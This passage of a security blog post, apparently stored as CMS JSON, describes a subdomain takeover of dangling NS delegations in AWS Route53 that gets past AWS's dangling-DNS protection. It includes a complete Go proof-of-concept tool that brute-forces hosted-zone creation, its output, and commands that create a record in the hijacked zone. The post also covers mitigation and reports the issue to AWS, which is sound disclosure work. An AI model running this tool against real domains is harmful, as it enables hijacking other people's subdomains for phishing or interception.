assigned.",[825,826,828,831],{"start":495,"end":496,"type":454},{"start":720,"end":827,"type":454},145,{"start":829,"end":830,"type":454},169,189,{"start":832,"end":833,"type":454},231,252,"rich_text$154e4160-97ad-4c3b-aaaa-22346fdf5ec6",{"variation":436,"version":458,"items":836,"primary":837,"id":851,"slice_type":483,"slice_label":13},[],{"eyebrow":13,"heading":838,"body":839,"cta_label":13,"cta_link":840,"aside_type":465,"aside_image":841,"aside_video":846,"aside_video_poster":847,"aside_video_reduced_motion":848,"aside_video_url":13,"aside_embed":849,"pardot_form_url":13,"form_submit_label":13,"form_variant":474,"form_heading":13,"redirect_on_success":850,"theme":477,"overlay_pattern":478,"background_continuation":479,"media_position":480,"aside_vertical_align":481},[],[],{"link_type":464},{"dimensions":842,"alt":13,"copyright":13,"url":843,"id":844,"edit":845},{"width":701,"height":407},"\u002F_prismic-media\u002Fbd3f5e6e10f93995-jS2-n5ysTyA-cS0K_c11aa6c5-e59a-46e1-b426-a851403.png","jS2-n5ysTyA-cS0K",{"x":17,"y":17,"zoom":18,"background":19},{"link_type":470},{},{},{},{"link_type":476},"content_block$6bcf9410-2534-4a03-baaf-544d19f391a4",{"variation":436,"version":437,"items":853,"primary":854,"id":859,"slice_type":456,"slice_label":13},[],{"body":855},[856],{"type":426,"text":857,"spans":858},"This prompted me to create a PoC to test that.",[],"rich_text$af5deef1-000d-49bc-bd9a-5e5d4cebc6c5",{"variation":436,"version":437,"items":861,"primary":862,"id":867,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":863},[864],{"type":540,"text":865,"spans":866},".\u002Fns-takeover dangling.example.com\n\nLooking up dangling.example.com using a.root-servers.net\nLooking up dangling.example.com using e.gtld-servers.net.\nLooking up dangling.example.com using ns-172.awsdns-21.com.\nLooking up dangling.example.com using ns-1084.awsdns-07.org.\n\nAttempting a takeover for dangling.example.com. by creating example.com, looking for NS=[{Name:dangling.example.com. NS:ns-1084.awsdns-07.org.} {Name:dangling.example.com. NS:ns-1929.awsdns-49.co.uk.} {Name:dangling.example.com. NS:ns-362.awsdns-45.com.} {Name:dangling.example.com. NS:ns-528.awsdns-02.net.}]\n\n#0: Nameservers do not match, got [ns-1675.awsdns-17.co.uk ns-1232.awsdns-26.org ns-1010.awsdns-62.net ns-496.awsdns-62.com], removing\n#1: Nameservers do not match, got [ns-459.awsdns-57.com ns-1548.awsdns-01.co.uk ns-653.awsdns-17.net ns-1499.awsdns-59.org], removing\n#2: Nameservers do not match, got [ns-241.awsdns-30.com ns-1228.awsdns-25.org ns-1940.awsdns-50.co.uk ns-516.awsdns-00.net], removing\n#3: Nameservers do not match, got [ns-1654.awsdns-14.co.uk ns-1410.awsdns-48.org ns-588.awsdns-09.net ns-211.awsdns-26.com], removing\n[...]\n#102: Takeover successful: ns-528.awsdns-02.net, zoneID: \u002Fhostedzone\u002FZ0123",[],"code_block$0f91eaba-e345-4db7-966c-4bde73cb4b49",{"variation":436,"version":437,"items":869,"primary":870,"id":883,"slice_type":456,"slice_label":13},[],{"body":871},[872,878],{"type":426,"text":873,"spans":874},"And with that we've performed a takeover. The next step is to create a record for dangling.example.com",[875],{"start":876,"end":877,"type":454},82,102,{"type":426,"text":879,"spans":880},"create-record.json:",[881],{"start":17,"end":882,"type":454},18,"rich_text$1a1dc32c-49e0-4dc4-8aa3-a817ab54c234",{"variation":436,"version":437,"items":885,"primary":886,"id":891,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":887},[888],{"type":540,"text":889,"spans":890},"{\n    \"Comment\": \"add dangling.example.com record\",\n    \"Changes\": [\n        {\n            \"Action\": \"CREATE\",\n            \"ResourceRecordSet\": {\n                \"Name\": \"dangling.example.com.\",\n                \"Type\": \"A\",\n                \"TTL\": 300,\n                \"ResourceRecords\": [\n                    {\n                        \"Value\": \"127.0.0.1\"\n                    }\n                ]\n            }\n        }\n    ]\n}",[],"code_block$c74c8c2f-4ee5-444c-a18e-418e734ab3c0",{"variation":436,"version":437,"items":893,"primary":894,"id":899,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":895},[896],{"type":540,"text":897,"spans":898},"aws route53 change-resource-record-sets --hosted-zone-id Z0123 --change-batch file:\u002F\u002Fcreate-record.json",[],"code_block$5f8eae6d-f2ea-422d-bc8c-e29ccd2ecdaf",{"variation":436,"version":437,"items":901,"primary":902,"id":907,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":903},[904],{"type":540,"text":905,"spans":906},"$ dig dangling.example.com\n\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> a dangling.example.com\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER\u003C\u003C- opcode: QUERY, status: NOERROR, id: 21681\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;dangling.example.com.       IN      A\n\n;; ANSWER SECTION:\ndangling.example.com.            300     IN      A       127.0.0.1",[],"code_block$3f31a791-d4a4-4cec-abab-52471cfcd9e2",{"variation":436,"version":437,"items":909,"primary":910,"id":915,"slice_type":544,"slice_label":13},[],{"language_label":13,"code":911},[912],{"type":540,"text":913,"spans":914},"package main\n\nimport (\n\t\"context\"\n\t\"errors\"\n\t\"fmt\"\n\t\"github.com\u002Faws\u002Faws-sdk-go-v2\u002Fconfig\"\n\t\"github.com\u002Faws\u002Faws-sdk-go-v2\u002Fservice\u002Froute53\"\n\t\"github.com\u002Faws\u002Faws-sdk-go-v2\u002Fservice\u002Froute53\u002Ftypes\"\n\t\"github.com\u002Fmiekg\u002Fdns\"\n\t\"log\"\n\t\"net\"\n\t\"os\"\n\t\"strings\"\n\t\"time\"\n)\n\nfunc resolveNSIP(nameserver string) (net.IP, error) {\n\tip := net.ParseIP(nameserver)\n\tif ip != nil {\n\t\treturn ip, nil\n\t}\n\n\tips, err := net.LookupIP(nameserver)\n\tif err != nil {\n\t\treturn ip, err\n\t}\n\n\tif len(ips) \u003C= 0 {\n\t\treturn ip, errors.New(\"no records found\")\n\t}\n\treturn ips[0], nil\n}\n\n\u002F\u002F nameserver can be a hostname or an ip address\nfunc nonRecursiveLookup(name, nameserver string, rType uint16) (*dns.Msg, error) {\n\tnameserverIP, err := resolveNSIP(nameserver)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tmsg := &dns.Msg{}\n\tmsg.SetQuestion(dns.Fqdn(name), rType)\n\tmsg.RecursionDesired = false\n\n\tc := &dns.Client{}\n\tresp, _, err := c.Exchange(msg, net.JoinHostPort(nameserverIP.String(), \"53\"))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"error looking up authoritative NS records for %s using %s: %w\", name, nameserver, err)\n\t}\n\n\treturn resp, err\n}\n\ntype NS struct {\n\tName string\n\tNS   string\n}\n\nconst maxRecursionDepth = 40\n\nfunc DanglingRecords(name string) ([]NS, error) {\n\tdelegatedNS := []NS{\n\t\t{\n\t\t\tName: \".\",\n\t\t\tNS:   \"a.root-servers.net\",\n\t\t},\n\t}\n\tname = strings.TrimSuffix(name, \".\")\n\n\tfor i := 0; ; i++ {\n\t\tif i == maxRecursionDepth {\n\t\t\treturn nil, errors.New(\"max recursion depth reached, something weird is going on\")\n\t\t}\n\n\t\tlog.Printf(\"Looking up %s using %s\", name, delegatedNS[0].NS)\n\n\t\t\u002F\u002F NOTE: we probably want to test other NS records in case\n\t\t\u002F\u002F - a takeover was already performed\n\t\t\u002F\u002F - only a single NS record is misconfigured\n\t\tmsg, err := nonRecursiveLookup(name, delegatedNS[0].NS, dns.TypeNS)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tif msg.Rcode != dns.RcodeSuccess {\n\t\t\treturn delegatedNS, nil\n\t\t}\n\n\t\tdelegatedNS = []NS{}\n\t\tfor _, rec := range msg.Ns {\n\t\t\tif nsRec, ok := rec.(*dns.NS); ok {\n\t\t\t\tdelegatedNS = append(delegatedNS, NS{\n\t\t\t\t\tName: nsRec.Hdr.Name,\n\t\t\t\t\tNS:   nsRec.Ns,\n\t\t\t\t})\n\t\t\t}\n\t\t}\n\n\t\tif len(delegatedNS) == 0 {\n\t\t\treturn nil, nil\n\t\t}\n\t}\n}\n\nfunc main() {\n\tctx := context.Background()\n\tif len(os.Args) != 2 {\n\t\tlog.Fatalln(\"usage: ns-takeover \u003CFQDN>\")\n\t}\n\n\tdomainToTakeover := strings.TrimSuffix(os.Args[1], \".\") + \".\"\n\n\tsess, err := config.LoadDefaultConfig(ctx)\n\tif err != nil {\n\t\tlog.Fatalln(\"error loading session config for aws client\", err)\n\t}\n\n\tdnsClient := route53.NewFromConfig(sess)\n\tdanglingNS, err := DanglingRecords(domainToTakeover)\n\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tif len(danglingNS) == 0 {\n\t\tlog.Println(\"no dangling records found, takeover not possible\")\n\t\tos.Exit(1)\n\t}\n\n\t\u002F\u002F AWS has a protection against creating dangling records: https:\u002F\u002Fdocs.aws.amazon.com\u002FRoute53\u002Flatest\u002FDeveloperGuide\u002Fprotection-from-dangling-dns.html\n\t\u002F\u002F Creating a public zone for a parent domain circumvents the protection\n\tparentZone := strings.Join(strings.Split(strings.TrimSuffix(danglingNS[0].Name, \".\"), \".\")[1:], \".\")\n\n\tlog.Printf(\"Attempting a takeover for %s by creating %s, looking for NS=%+v\", domainToTakeover, parentZone, danglingNS)\n\n\tfor i := 0; ; i++ {\n\t\tref := fmt.Sprintf(\"ns-brute-%s\", time.Now().String())\n\t\tcomment := \"ns-brute\"\n\t\tout, err := dnsClient.CreateHostedZone(ctx, &route53.CreateHostedZoneInput{\n\t\t\tCallerReference: &ref,\n\t\t\tName:            &parentZone,\n\t\t\tHostedZoneConfig: &types.HostedZoneConfig{\n\t\t\t\tComment:     &comment,\n\t\t\t\tPrivateZone: false,\n\t\t\t},\n\t\t})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Creating Hosted Zone failed: %s\", err)\n\t\t}\n\n\t\tds := out.DelegationSet\n\t\tif ds == nil || len(ds.NameServers) == 0 {\n\t\t\tlog.Fatal(\"Creating Hosted Zone failed: delegation set is empty\")\n\t\t}\n\n\t\tfor _, ns := range ds.NameServers {\n\t\t\tzoneNS := strings.ToLower(strings.TrimSuffix(ns, \".\"))\n\t\t\tfor _, targetNS := range danglingNS {\n\t\t\t\tunifiedTargetNS := strings.ToLower(strings.TrimSuffix(targetNS.NS, \".\"))\n\t\t\t\tif zoneNS == unifiedTargetNS {\n\t\t\t\t\tlog.Printf(\"#%d: Takeover successful: %s, zoneID: %s\", i, ns, *out.HostedZone.Id)\n\t\t\t\t\tos.Exit(0)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tlog.Printf(\"#%d: Nameservers do not match, got %v, removing\", i, ds.NameServers)\n\n\t\t_, err = dnsClient.DeleteHostedZone(ctx, &route53.DeleteHostedZoneInput{Id: out.HostedZone.Id})\n\t\tif err != nil {\n\t\t\tlog.Fatal(\"Removing hosted zone failed\", err)\n\t\t}\n\n\t\t\u002F\u002F be gentle :)\n\t\ttime.Sleep(1 * time.Second)\n\t}\n}",[],"code_block$365c11c4-6968-4837-b4ff-2fe9b9e4155e",{"variation":436,"version":437,"items":917,"primary":918,"id":929,"slice_type":456,"slice_label":13},[],{"body":919},[920,923,926],{"type":442,"text":921,"spans":922},"Ineffective protection might be worse than no protection at all",[],{"type":426,"text":924,"spans":925},"One could easily imagine a scenario where a dangling record is discovered using a perimeter scanner of sorts. It'd be easy to downplay the finding by citing the protection.",[],{"type":426,"text":927,"spans":928},"In such case you might wrongly believe that your systems are secure. The false sense of security can lead to lack of urgency in addressing the security risk. In contrast, if there's no protection and you are aware of the vulnerability you will prioritize fixing it.",[],"rich_text$7893c184-9101-454c-9a80-45f5dd95a095",{"variation":436,"version":437,"items":931,"primary":932,"id":953,"slice_type":456,"slice_label":13},[],{"body":933},[934,937,940,946],{"type":442,"text":935,"spans":936},"Reporting the vulnerability to AWS support",[],{"type":426,"text":938,"spans":939},"After discovering the vulnerability we've contacted AWS support and they updated the documentation to reflect the issues discovered in this post.",[],{"type":426,"text":941,"spans":942},"The documentation is now a decent resource on how to mitigate the risk of NS misconfiguration.",[943],{"start":17,"end":944,"type":721,"data":945},17,{"link_type":430,"url":745},{"type":426,"text":947,"spans":948},"AWS has vulnerability reporting guidelines, which you can find under https:\u002F\u002Faws.amazon.com\u002Fsecurity\u002Fvulnerability-reporting\u002F",[949],{"start":664,"end":950,"type":721,"data":951},125,{"link_type":430,"url":952},"https:\u002F\u002Faws.amazon.com\u002Fsecurity\u002Fvulnerability-reporting\u002F","rich_text$3e7e28c4-c2f7-4301-b2ef-0315c40a9c1a",{"variation":436,"version":437,"items":955,"primary":956,"id":964,"slice_type":456,"slice_label":13},[],{"body":957},[958,961],{"type":442,"text":959,"spans":960},"Conclusions",[],{"type":426,"text":962,"spans":963},"New venues of executing subdomain takeovers continue to emerge even with protections in place. While using cloud services offers great security benefits, blindly trusting documentation might not cut it. Conduct your own tests and double-check claims. If you find anything, report it. It not only keeps you safe, but also helps others.",[],"rich_text$b3957f7c-1a02-4087-8ef3-d69b7f070895",1788399680527]